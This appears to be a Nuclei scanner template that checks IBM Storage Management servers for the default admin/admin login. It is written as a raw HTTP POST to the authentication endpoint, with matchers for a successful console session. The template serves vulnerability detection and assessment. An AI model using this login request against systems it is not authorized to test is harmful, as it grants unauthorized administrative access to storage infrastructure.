id: ibm-storage-default-login

info:
  name: IBM Storage Management Default Login
  author: madrobot
  severity: high
  description: IBM Storage Management default admin login credentials were discovered.
  reference:
    - https://www.ibm.com/docs/en/power-sys-solutions/0008-ESS?topic=5148-starting-elastic-storage-server-management-server-gui
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  tags: default-login,ibm,storage

http:
  - raw:
      - |
        POST /0/Authenticate HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}&continue=&submit=submit+form

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "/0/Console"
          - "Property of IBM"
        condition: and

        part: body
      - type: word
        words:
          - "JSESSIONID"

        part: header
      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/10
